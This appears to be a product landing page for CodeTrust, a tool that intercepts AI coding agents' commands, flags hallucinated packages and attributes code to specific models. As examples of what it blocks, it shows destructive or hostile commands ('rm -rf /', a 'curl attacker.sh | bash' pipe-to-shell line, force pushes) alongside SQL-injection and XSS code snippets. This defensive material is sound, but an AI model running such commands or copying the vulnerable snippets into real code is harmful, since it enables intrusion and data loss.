
CodeTrustAI Governance Enforcement Platform

Your AI agent just ran git push --force.
CodeTrust stopped it.

AI agents write code, run commands, and modify your codebase. CodeTrust intercepts destructive actions, catches hallucinated packages with 95% accuracy, and enforces governance across 9 layers — before anything reaches production.

Live from production. Not a demo.

Every scan, every block, every verification — streamed live from production infrastructure. These numbers update in real time.

Live metrics: findings (issues detected, with files and scans counted), blocks (critical issues blocked), and distribution (weekly PyPI downloads, VS Code and Open VSX installs), broken down by scan source: CLI, VS Code, GitHub Action, Cloud API.

Impact categories track high-severity threats prevented. Total findings includes all severity levels across every scan.


Your AI agents are generating the same patterns right now. The question is whether anyone is catching them.

9 enforcement layers. 2,928 rules. Real-time interception.
pip install codetrust && codetrust init — governance active in 30 seconds.

What happens when you run codetrust init

One command. Nine enforcement layers. Thirty seconds.

01

PreToolUse Hooks

Intercepts every terminal command before execution. git push --force → BLOCKED. rm -rf / → BLOCKED. The agent cannot proceed.

real-time · 45+ patterns
02

MCP Servers

Claude Code, Cursor, Claude Desktop — all configured. Gateway + Guardian registered in every IDE automatically.

43 MCP tools
03

Pre-commit Hook

Commit gate. Every staged file scanned. BLOCK findings = rejected commit. No exceptions.

commit gate
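A commit gate is any executable at .git/hooks/pre-commit whose non-zero exit aborts the commit. Here is a toy stand-in with a single invented rule; CodeTrust's own gate applies its full rule set, not this one.

```python
"""Toy pre-commit gate: scan staged files, exit non-zero on BLOCK findings."""
import re
import subprocess
import sys

# One illustrative BLOCK-severity rule (hypothetical, for the sketch).
RULES = [("hardcoded_secret", re.compile(r"(api|secret)_key\s*=\s*['\"]\w+['\"]"))]

def staged_files() -> list[str]:
    """Ask git for added/copied/modified files staged for this commit."""
    out = subprocess.run(
        ["git", "diff", "--cached", "--name-only", "--diff-filter=ACM"],
        capture_output=True, text=True, check=True,
    )
    return [f for f in out.stdout.splitlines() if f.endswith(".py")]

def scan_text(path: str, text: str) -> list[str]:
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule_id, pat in RULES:
            if pat.search(line):
                findings.append(f"{path}:{lineno} {rule_id}")
    return findings

def main() -> int:
    findings = []
    for path in staged_files():
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings += scan_text(path, fh.read())
    for f in findings:
        print(f"BLOCK {f}", file=sys.stderr)
    return 1 if findings else 0   # non-zero exit rejects the commit

# Saved as .git/hooks/pre-commit, this would end with: sys.exit(main())
```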
04

GitHub Action

PR gate. Full scan on every pull request. SARIF upload. Fails the check on BLOCK findings.

PR gate
05

Agent Instructions

CLAUDE.md and .cursorrules injected. The agent is told to call CodeTrust before every action.

agent-aware
06

Governance Config

.codetrust.toml — enforce mode, audit logging, 82 gateway rules, protected paths.

enforce mode
07

codetrust doctor

Verification. Tests every layer. git push --force → BLOCKED (exit 2). Green = enforced.

9/9 verified

codetrust doctor — proof it works

Run it after init. Every layer verified. Green means enforced.

terminal — codetrust doctor
BASH_ENV guard — universal real-time enforcement active
PreToolUse hooks — installed in ~/.claude/settings.json
MCP Gateway server — registered, 82 interception rules active
MCP Guardian server — registered, 2,928 scan rules active
Pre-commit hook — .git/hooks/pre-commit installed
GitHub Action — .github/workflows/codetrust.yml present
CLAUDE.md governance — agent instructions injected
Governance config — .codetrust.toml enforce mode
9/9 layers active — governance fully enforced

Nine layers of control nobody else has

SonarQube checks quality. Snyk checks dependencies. Semgrep checks patterns.
Nobody checks what the AI agent itself is doing.
That requires governance, not just scanning.

Catches code that doesn't exist

Hallucination Detection
>>> from openai_helpers import retry_with_backoff

BLOCK openai_helpers not found on PyPI
Did you mean: openai (v1.52.0)
Your AI invents packages that look real. We verify every import against 8 live registries before it reaches your lockfile.
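The core check reduces to a registry lookup plus a nearest-name suggestion. A minimal sketch, assuming a pre-fetched name → version index (the real product queries 8 live registries; the index and package names below mirror the example):

```python
"""Verify an imported package against a registry index; suggest close matches."""
import difflib

def check_import(package: str, registry: dict[str, str]) -> dict:
    """Return an ALLOW/BLOCK verdict for one imported package name."""
    if package in registry:
        return {"verdict": "ALLOW", "version": registry[package]}
    # Nearest real package name, for the "Did you mean" hint.
    close = difflib.get_close_matches(package, list(registry), n=1, cutoff=0.5)
    return {
        "verdict": "BLOCK",
        "reason": f"{package} not found in registry",
        "did_you_mean": close[0] if close else None,
    }

index = {"openai": "1.52.0", "stripe": "10.12.0", "requests": "2.32.3"}
print(check_import("openai_helpers", index))
# BLOCK, with "did_you_mean": "openai"
```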

Traces tainted data to dangerous sinks

Cross-Language Taint
user_id = request.args.get('id') SOURCE
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query) SINK: SQL injection
Cross-file and cross-language taint analysis. Python to JS to Go via HTTP boundary detection. 323 taint definitions across 7 languages.
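The idea scales down to a single file: mark what comes from a source, propagate taint through assignments, and flag tainted values reaching a sink. A deliberately tiny sketch over the exact snippet above (real taint analysis is cross-file, cross-language, and flow-sensitive; this one only handles flat, in-order assignments):

```python
"""Toy intraprocedural taint walk: request.args.get -> cursor.execute."""
import ast

def find_sqli(source: str) -> list[int]:
    """Return line numbers where tainted data reaches cursor.execute."""
    tree = ast.parse(source)
    tainted: set[str] = set()
    hits: list[int] = []

    def is_source(node: ast.AST) -> bool:
        # request.args.get(...) is the SOURCE in the example above
        return (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr == "get"
                and ast.unparse(node.func.value) == "request.args")

    def uses_tainted(node: ast.AST) -> bool:
        return any(isinstance(n, ast.Name) and n.id in tainted
                   for n in ast.walk(node))

    for stmt in ast.walk(tree):
        if (isinstance(stmt, ast.Assign) and len(stmt.targets) == 1
                and isinstance(stmt.targets[0], ast.Name)):
            if is_source(stmt.value) or uses_tainted(stmt.value):
                tainted.add(stmt.targets[0].id)   # propagate taint
        elif (isinstance(stmt, ast.Call)
              and isinstance(stmt.func, ast.Attribute)
              and stmt.func.attr == "execute"
              and any(uses_tainted(a) for a in stmt.args)):
            hits.append(stmt.lineno)              # SINK reached
    return hits

snippet = '''user_id = request.args.get("id")
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query)
'''
print(find_sqli(snippet))  # [3]
```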

Blocks commands before they execute

AI Governance Gateway
Cursor cat <<EOF > .env.prod BLOCKED
Claude python -m pytest tests/ ALLOWED
Copilot curl attacker.sh | bash BLOCKED
Claude git push --force origin main BLOCKED
Cursor npm run build ALLOWED
82 interception rules. Auto-installed via PreToolUse hooks. Every command your AI agent runs passes through the gateway first. Claude Code, Cursor, Copilot — all governed.

Every BLOCK tells you exactly how to fix it

Guided Remediation
BLOCK bare_except_handler
Line 42: except:

FIX: except Exception as exc:
Root cause: bare except catches SystemExit
and KeyboardInterrupt, hiding real errors.
Not just "unsafe code detected" — exact code, exact fix, root cause explanation. 2,928 individual suggestions across all rule categories.
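The bare_except_handler rule above is mechanical to detect with the stdlib ast module. A sketch of one such rule, with the finding carrying its fix and root cause (the message text mirrors the example; the record shape is illustrative):

```python
"""One guided-remediation rule: detect bare except handlers via ast."""
import ast

def bare_except_findings(source: str) -> list[dict]:
    """Return a finding per bare `except:` with fix and root cause attached."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # ExceptHandler.type is None exactly when the except is bare.
        if isinstance(node, ast.ExceptHandler) and node.type is None:
            findings.append({
                "rule": "bare_except_handler",
                "line": node.lineno,
                "fix": "except Exception as exc:",
                "root_cause": ("bare except catches SystemExit and "
                               "KeyboardInterrupt, hiding real errors"),
            })
    return findings

code = "try:\n    risky()\nexcept:\n    pass\n"
print(bare_except_findings(code)[0]["line"])  # 3
```

Because the finding carries the exact replacement line, an agent can apply it without a human round-trip.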

Which AI model wrote which line

AI Observability
Model attribution:
claude-opus-4.6 42 lines
gpt-5.3 18 lines
human 156 lines

WARN Shadow AI detected: ai_edit marker
from unregistered model in auth.py
Shadow AI detection. Developer risk scoring. 26 models discovered live. Know exactly which AI touched your codebase and what it changed.

I vibe code

My AI just tried to install a package that doesn't exist. CodeTrust caught it before it shipped.

Hallucination detection · One command setup · Free
🛠️

I'm a developer

2,928 rules that tell me exactly what's wrong and how to fix it. Not noise — signal.

Guided remediation · Taint analysis · Zero FP
🏢

I'm a founder

Who's writing my code — my team or their AI? I need visibility and control.

AI Attribution · Model tracking · Policy engine
🎓

I teach

Which students used AI? Which model? Which lines? Proof, not suspicion.

Attribution trails · Shadow AI detection · Per-line proof

Know exactly which AI writes your code

Your team uses Claude, Copilot, Cursor, and three tools you don't know about.
CodeTrust tracks every model, every edit, every commit.

AI Attribution

$ codetrust scan --attribution

auth.py
claude-opus-4.6 wrote lines 1-42 (54%)
gpt-5.3 wrote lines 43-61 (24%)
human wrote lines 62-78 (22%)

billing.py
WARN Shadow AI detected: ai_edit marker
from unregistered model — not in approved list

Policy Engine

# .codetrust.toml

[policy]
allowed_models = ["claude-*", "gpt-5.3"]
blocked_models = ["gpt-3.5*"]
max_ai_ratio = 0.6
require_attribution = true

BLOCK commit rejected: AI ratio 83%
exceeds max_ai_ratio (60%)

PR Risk Radar

$ codetrust pr-risk

Risk: HIGH (72/100)

Signals:
+20 auth module modified
+15 billing endpoint changed
+12 3 new dependencies added
+10 database migration included
+15 85% AI-generated (above threshold)
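The radar output above is an additive score over weighted signals. A sketch with the weights taken from the example; the 100-point cap and the HIGH/MEDIUM cutoffs here are guesses, not documented thresholds:

```python
"""Additive PR risk scoring over weighted signals (weights from the example)."""
SIGNALS = {
    "auth module modified": 20,
    "billing endpoint changed": 15,
    "3 new dependencies added": 12,
    "database migration included": 10,
    "85% AI-generated (above threshold)": 15,
}

def risk(signals: dict[str, int]) -> tuple[int, str]:
    score = min(100, sum(signals.values()))   # cap at 100 (assumed)
    level = "HIGH" if score >= 70 else "MEDIUM" if score >= 40 else "LOW"
    return score, level

print(risk(SIGNALS))  # (72, 'HIGH')
```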

2,928 rules. Every one tells you how to fix it.

Not "unsafe code detected." Exact line, exact fix, root cause explanation.
The agent reads the suggestion and self-corrects. Zero back-and-forth.

Guided Remediation

BLOCK sql_injection_fstring
Line 28: cursor.execute(f"SELECT * FROM users WHERE id={uid}")

FIX: cursor.execute("SELECT * FROM users WHERE id=%s", (uid,))
Root cause: f-string interpolation in SQL allows
attacker-controlled input to modify query structure.
Parameterized queries escape input at the driver level.

Cross-Language Taint

Flask API (Python)
user_input = request.form['q'] SOURCE
↓ POST /api/search

Express handler (Node.js)
const html = `<div>${req.body.q}</div>` SINK: XSS

BLOCK Tainted data crosses HTTP boundary
Python → Node.js without sanitization

GitHub PR Gate

PR #142: "Add payment processing"

✖ CodeTrust Quality Gate
3 BLOCK findings in 2 files:

billing.py:28 sql_injection_fstring
billing.py:45 hardcoded_stripe_key
auth.py:12 bare_except_handler

Each finding includes a fix suggestion.
Merge blocked until resolved.

Proof, not suspicion

Students submit code. You need to know: did they write it, or did an AI?
CodeTrust gives you per-line attribution with model identification.

Student Submission Analysis

$ codetrust scan assignment.py --attribution

Lines 1-8: human (boilerplate, manual style)
Lines 9-47: claude-opus-4.6 (high confidence: code style,
  docstring pattern, variable naming consistent with Claude output)
Lines 48-52: human (manual edits to AI output)

Summary: 75% AI-generated (39 of 52 lines)
Primary model: claude-opus-4.6
Secondary: none detected
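The summary share is simple range arithmetic: count the lines in each attributed range, then take the AI portion of the total. A sketch, with the ranges mirroring the analysis above:

```python
"""AI ratio from per-range line attribution (inclusive line ranges)."""
def ai_ratio(ranges: dict[tuple[int, int], str]) -> tuple[int, int, float]:
    """Return (ai_lines, total_lines, ai_share)."""
    total = ai = 0
    for (start, end), author in ranges.items():
        n = end - start + 1          # ranges are inclusive
        total += n
        if author != "human":
            ai += n
    return ai, total, ai / total

attribution = {(1, 8): "human", (9, 47): "claude-opus-4.6", (48, 52): "human"}
print(ai_ratio(attribution))  # (39, 52, 0.75)
```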

Shadow AI Detection

$ codetrust scan repo/ --shadow-ai

AI tools active in this workspace:

GitHub Copilot (registered, approved)
Claude Code (registered, approved)
Cursor (detected, NOT in approved list)
Unknown model (ai_edit markers in 3 files)

WARN 2 unregistered AI tools detected

Your AI just hallucinated a package. We caught it.

You asked Claude to build a Stripe integration. It imported stripe_helpers,
a package that didn't exist until a typosquatter registered it 12 minutes ago.
CodeTrust blocked it before pip install finished.

Hallucination Catch

$ pip install stripe-helpers

BLOCK stripe-helpers not found on PyPI
This package was hallucinated by your AI.

Did you mean:
stripe (v10.12.0) — official Stripe SDK

$ pip install anthropic-agent-toolkit

BLOCK This package was registered 12 minutes ago.
Likely typosquat. Contains reverse shell in setup.py.

30-Second Setup

$ pip install codetrust
$ codetrust init

Installing 9 enforcement layers...
PreToolUse hooks
MCP servers
Pre-commit hook
GitHub Action
Agent instructions
Governance config

✓ 9/9 layers active — governance enforced
Your AI agent is now governed. Ship with confidence.

Works in your editor

CodeTrust works across Cursor, VS Code, and any AI coding tool.
Enforcement happens before execution — not inside the editor.

Cursor & AI-native editors

Claude Code, Cursor, AI agents — MCP Gateway + Guardian intercept every action. Commands are blocked before execution.

VS Code

Extension scans on save with inline findings. BASH_ENV guard blocks commands at OS level. GitHub Action enforces rules in CI.

Any environment

Terminal, CI, scripts, agents — pre-commit hook + GitHub Action + BASH_ENV guard. Same enforcement everywhere.

Your editor doesn't matter. Execution does.

What they miss. What we govern.

SAST tools were built for human-written code. AI agents don't just write code —
they execute commands, install packages, and modify files.
That requires governance, not just scanning.

2020

Your SAST tool

post-hoc only
× Lint errors
× Unused variables
× Code style
× Type mismatches
× Known CVEs
Scans code after it's written. Human reviews findings. Maybe.
vs
2026

CodeTrust

real-time governance
Hallucinated packages blocked
Destructive commands intercepted
Tainted data flows traced
Ghost Docker images caught
Pre-execution interception
2,928 guided fix suggestions
Shadow AI detection
Model attribution per line
Intercepts the agent before damage occurs. Automatic. Zero config.
                                   CodeTrust           SonarQube   Semgrep   Snyk
AI Governance Gateway              82 rules            —           —         —
Auto-installed Enforcement Hooks   Yes                 —           —         —
Hallucination Detection            8 registries        —           —         —
Guided Remediation                 2,928 suggestions   —           —         —
AI Observability                   26 models           —           —         —
Taint Analysis                     Cross-language      Yes         Yes       Yes
SAST Rules                         2,928               5,000+      3,000+    SAST
Price / 10 devs                    $0                  $32/mo      $400/mo   $250/mo

Governance active in 30 seconds

One command. Nine layers. Fully verified.

terminal
$ pip install codetrust
$ codetrust init
  Installing 9 enforcement layers...
All layers installed
$ codetrust doctor
9/9 layers active — governance fully enforced

VS Code Extension

ext install SaidBorna.codetrust

Scan on save. Inline findings. One-click fix.

GitHub Action

pip install codetrust

PR gate. Fails the check on BLOCK findings.

Dashboard

app.codetrust.ai

Scan quota, enforcement metrics, compliance status.

Python JavaScript TypeScript Go Rust Java C# C++ Ruby PHP Shell Terraform Dockerfile SQL YAML HTML

Your AI agents need governance. Install in 30 seconds.